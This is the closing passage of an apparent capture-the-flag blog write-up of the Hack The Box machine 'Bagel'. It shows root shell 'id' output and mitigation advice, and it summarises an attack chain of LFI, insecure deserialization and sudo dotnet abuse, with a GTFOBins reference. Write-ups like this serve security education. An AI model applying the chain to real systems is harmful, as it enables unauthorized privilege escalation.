src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/sudo.png" width="1660" height="396" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/sudo_hu909c7d2998fcfcdc25e408d4119683e4_70351_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/sudo_hu909c7d2998fcfcdc25e408d4119683e4_70351_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="419" data-flex-basis="1006px" ></p> <p>I ran the commands and got the root user. 🎉</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">sh</span><span class="o">-</span><span class="mf">5.2</span><span class="o">#</span> <span class="n">id</span> </span></span><span class="line"><span class="cl"><span class="n">uid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">gid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">groups</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">context</span><span class="o">=</span><span class="n">unconfined_u</span><span class="p">:</span><span class="n">unconfined_r</span><span class="p">:</span><span class="n">unconfined_t</span><span class="p">:</span><span class="n">s0</span><span class="o">-</span><span class="n">s0</span><span class="p">:</span><span class="n">c0.c1023</span> </span></span></code></pre></div><h2 id="mitigation-techniques">Mitigation Techniques </h2><ol> <li><strong>Input Validation and Filtering</strong>: Implement strict input validation and filtering mechanisms to prevent injection attacks, including LFI (Local File Inclusion) vulnerabilities. Validate and sanitize all user inputs and file paths to ensure they do not allow unauthorized access to system files.</li> <li><strong>Secure Deserialization</strong>: Use safe deserialization practices, such as validating input types and using whitelists for allowed types during deserialization. Avoid using frameworks or libraries that automatically deserialize data without proper validation, as this can lead to remote code execution vulnerabilities.</li> <li><strong>Least Privilege Principle</strong>: Restrict privileges granted to applications and users to the minimum necessary for their functionality. Avoid granting unnecessary sudo or administrative rights, especially to binaries like dotnet, which can be abused to escalate privileges.</li> <li><strong>Monitoring and Logging</strong>: Implement comprehensive logging and monitoring of system activities, especially those involving sensitive operations like sudo access. Monitor for unusual or unauthorized activities to detect and respond to potential security breaches promptly.</li> <li><strong>Regular Security Audits and Patching</strong>: Conduct regular security audits to identify and mitigate vulnerabilities in applications and systems. Keep software and libraries up to date with security patches to protect against known vulnerabilities.</li> </ol> <h2 id="conclusion">Conclusion </h2><p>The penetration test revealed critical vulnerabilities including Local File Inclusion (LFI), insecure deserialization, and privileged escalation through misuse of sudo rights. These findings show the importance of strict security practices, including secure coding, proper input validation, and adherence to the principle of least privilege. It was a fun box.</p> <h2 id="references">References </h2><ol> <li><a class="link" href="https://gtfobins.github.io/gtfobins/dotnet/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/dotnet/</a></li> <li><a class="link" href="https://github.com/websockets/wscat" target="_blank" rel="noopener" >https://github.com/websockets/wscat</a></li> <li><a class="link" href="https://www.jetbrains.com/rider/" target="_blank" rel="noopener" >https://www.jetbrains.com/rider/</a></li> <li><a class="link" href="https://www.newtonsoft.com/json/help/html/SerializeTypeNameHandling.htm" target="_blank" rel="noopener" >https://www.newtonsoft.com/json/help/html/SerializeTypeNameHandling.htm</a></li> <li><a class="link" href="https://caido.io/" target="_blank" rel="noopener" >https://caido.io/</a></li> <li><a class="link" href="https://gchq.github.io/CyberChef/" target="_blank" rel="noopener" >https://gchq.github.io/CyberChef/</a></li> <li><a class="link" href="https://ghidra-sre.org/" target="_blank" rel="noopener" >https://ghidra-sre.org/</a></li> <li><a class="link" href="https://www.jetbrains.com/decompiler/" target="_blank" rel="noopener" >https://www.jetbrains.com/decompiler/</a></li> <li><a class="link" href="https://github.com/dnSpy/dnSpy" target="_blank" rel="noopener" >https://github.com/dnSpy/dnSpy</a></li> </ol>